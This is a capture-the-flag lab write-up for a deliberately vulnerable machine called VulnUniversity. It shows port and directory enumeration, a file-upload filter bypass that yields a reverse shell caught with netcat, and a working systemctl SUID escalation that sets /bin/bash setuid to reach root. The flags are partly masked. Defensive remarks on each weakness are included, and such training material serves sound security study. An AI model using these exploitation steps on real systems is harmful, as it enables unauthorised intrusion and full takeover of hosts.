
VulnUniversity

Enumeration:
nmap -sC -sV 10.10.170.189 -oN initial

21/tcp open ftp vsftpd 3.0.3


22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:


| smb2-time:
| date: 2022-03-16T15:40:52
|_ start_date: N/A
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2022-03-16T11:40:51-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
(unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required

(root EthicalSharmaji)-[~/THMOSCPPath/vulnuniv]
└─# gobuster dir -u http://10.10.170.189:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobust.txt

Gobuster found the /internal directory.

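Uploading a file with the .php extension was rejected, so other extensions found via a Google search were tested. That one of them was accepted suggests the upload form filters on a denylist of extensions; an allowlist of the expected file types is the more robust control.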

The file uploaded successfully. Further enumeration for the upload directory found it at /internal/uploads.

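Requesting the uploaded file through the web server executes it, and the shell connects back to the listener. The upload directory being both web-accessible and allowed to run scripts is what turns a file upload into code execution; serving uploads from a location where script execution is disabled would prevent it.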

──(root EthicalSharmaji)-[~/THMOSCPPath/vulnuniv]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [10.17.41.167] from (UNKNOWN) [10.10.170.189] 45306
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64

x86_64 x86_64 GNU/Linux
13:20:27 up 1:41, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ ls -al
total 96
drwxr-xr-x 23 root root 4096 Jul 31 2019 .
drwxr-xr-x 23 root root 4096 Jul 31 2019 ..
drwxr-xr-x 2 root root 4096 Jul 31 2019 bin
drwxr-xr-x 3 root root 4096 Jul 31 2019 boot
drwxr-xr-x 17 root root 3700 Mar 16 11:39 dev
drwxr-xr-x 98 root root 4096 Aug 1 2019 etc
drwxr-xr-x 3 root root 4096 Jul 31 2019 home
lrwxrwxrwx 1 root root 33 Jul 31 2019 initrd.img -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x 22 root root 4096 Jul 31 2019 lib
drwxr-xr-x 2 root root 4096 Jul 31 2019 lib64
drwx------ 2 root root 16384 Jul 31 2019 lost+found
drwxr-xr-x 3 root root 4096 Jul 31 2019 media
drwxr-xr-x 2 root root 4096 Feb 26 2019 mnt
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
dr-xr-xr-x 137 root root 0 Mar 16 11:38 proc
drwx------ 4 root root 4096 Jul 31 2019 root
drwxr-xr-x 28 root root 980 Mar 16 11:39 run
drwxr-xr-x 2 root root 12288 Jul 31 2019 sbin
drwxr-xr-x 2 root root 4096 Jul 31 2019 snap
drwxr-xr-x 3 root root 4096 Jul 31 2019 srv
dr-xr-xr-x 13 root root 0 Mar 16 11:38 sys
drwxrwxrwt 8 root root 4096 Mar 16 13:17 tmp
drwxr-xr-x 10 root root 4096 Jul 31 2019 usr
drwxr-xr-x 14 root root 4096 Jul 31 2019 var
lrwxrwxrwx 1 root root 30 Jul 31 2019 vmlinuz -> boot/vmlinuz-4.4.0-142-generic
$ cd /home
$ ls
bill
$ cd bill
$ ls
user.txt
$ whoami && cat user.txt && ifconfig
www-data
8bd7992fbe8a6ad*****(Intentionally * added)
eth0 Link encap:Ethernet HWaddr 02:5e:bb:59:0d:97
inet addr:10.10.170.189 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::5e:bbff:fe59:d97/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:96350 errors:0 dropped:0 overruns:0 frame:0
TX packets:94946 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6669760 (6.6 MB) TX bytes:24660136 (24.6 MB)

lo Link encap:Local Loopback


inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:654 errors:0 dropped:0 overruns:0 frame:0
TX packets:654 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:58652 (58.6 KB) TX bytes:58652 (58.6 KB)

Privilege Escalation:
$ uname -a
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
x86_64 x86_64 GNU/Linux

$ find / -perm -u=s -type f 2>/dev/null


/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs

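/bin/systemctl stands out in this list: it is not setuid-root on a default install, and with the SUID bit set any local user can have systemd run a unit file of their choosing as root. The technique used below is the one documented at https://gtfobins.github.io/gtfobins/systemctl/
Removing the SUID bit from /bin/systemctl, and comparing the SUID binaries on a host against a known-good baseline, closes this path.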

www-data@vulnuniversity:/home/bill$ TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TFTF=$(mktemp).service
www-data@vulnuniversity:/home/bill$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "chmod +s /bin/bash"
> [Install]
> WantedBy=multi-user.target' > $TF

www-data@vulnuniversity:/home/bill$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.gzegTgkVSR.service to /tmp/tmp.gzegTgkVSR.service.
www-data@vulnuniversity:/home/bill$
/bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.gzegTgkVSR.service to /tmp/tmp.gzegTgkVSR.service.

www-data@vulnuniversity:/home/bill$ ls -al /bin/bash


ls -al /bin/bash
-rwsr-sr-x 1 root root 1037528 May 16 2017 /bin/bash
www-data@vulnuniversity:/home/bill$ /bin/bash -p
/bin/bash -p
bash-4.3# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-4.3# whoami
whoami
root
bash-4.3# ls
ls
user.txt
bash-4.3# cd /root
cd /root
bash-4.3# ls
ls
root.txt
bash-4.3# whoami && cat root.txt && ifconfig
whoami && cat root.txt && ifconfig
root
a58ff8579f0a9270368d3***** (Intentionally * added)
eth0 link encap:ethernet HWaddr 02:5e:bb:59:0d:97
inet addr:10.10.170.189 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::5e:bbff:fe59:d97/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:96513 errors:0 dropped:0 overruns:0 frame:0
TX packets:95080 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6680997 (6.6 MB) TX bytes:24675647 (24.6 MB)

lo Link encap:Local Loopback


inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:729 errors:0 dropped:0 overruns:0 frame:0
TX packets:729 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:62348 (62.3 KB) TX bytes:62348 (62.3 KB)
